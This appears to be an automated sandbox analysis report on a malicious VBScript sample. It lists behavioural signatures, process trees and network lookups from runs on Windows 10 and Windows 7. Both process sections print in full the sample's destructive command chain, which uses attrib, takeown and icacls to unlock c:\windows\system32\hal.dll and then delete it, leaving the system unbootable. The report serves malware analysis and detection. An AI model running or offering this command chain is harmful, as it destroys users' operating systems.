Malware Analysis Report

2024-11-16 12:49

Sample ID 240809-yzt8ra1gjf
Target file.vbs
SHA256 d6d614cf4fabb1147ca3a48ce42dce7441b5f193e9842eda16aca294786d6c1b
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

d6d614cf4fabb1147ca3a48ce42dce7441b5f193e9842eda16aca294786d6c1b

Threat Level: Likely malicious

The file file.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-09 20:13

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-09 20:13

Reported

2024-08-09 20:16

Platform

win10v2004-20240802-en

Max time kernel

138s

Max time network

141s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\windows\system32\hal.dll C:\Windows\system32\attrib.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1776 wrote to memory of 5052 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1776 wrote to memory of 5052 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5052 wrote to memory of 3324 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\attrib.exe
PID 5052 wrote to memory of 3324 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\attrib.exe
PID 5052 wrote to memory of 4808 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 5052 wrote to memory of 4808 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 5052 wrote to memory of 1792 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 5052 wrote to memory of 1792 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k attrib -r -s -h c:\windows\system32\hal.dll && takeown /f c:\windows\system32\hal.dll && icacls c:\windows\system32\hal.dll /grant everyone:(F) && del /s /q c:\windows\system32\hal.dll

C:\Windows\system32\attrib.exe

attrib -r -s -h c:\windows\system32\hal.dll

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\hal.dll

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\hal.dll /grant everyone:(F)

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-09 20:13

Reported

2024-08-09 20:16

Platform

win7-20240729-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\windows\system32\hal.dll C:\Windows\system32\attrib.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3068 wrote to memory of 2388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3068 wrote to memory of 2388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3068 wrote to memory of 2388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2388 wrote to memory of 2676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\attrib.exe
PID 2388 wrote to memory of 2676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\attrib.exe
PID 2388 wrote to memory of 2676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\attrib.exe
PID 2388 wrote to memory of 2680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2388 wrote to memory of 2680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2388 wrote to memory of 2680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2388 wrote to memory of 2840 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2388 wrote to memory of 2840 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2388 wrote to memory of 2840 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k attrib -r -s -h c:\windows\system32\hal.dll && takeown /f c:\windows\system32\hal.dll && icacls c:\windows\system32\hal.dll /grant everyone:(F) && del /s /q c:\windows\system32\hal.dll

C:\Windows\system32\attrib.exe

attrib -r -s -h c:\windows\system32\hal.dll

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\hal.dll

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\hal.dll /grant everyone:(F)

Network

N/A

Files

N/A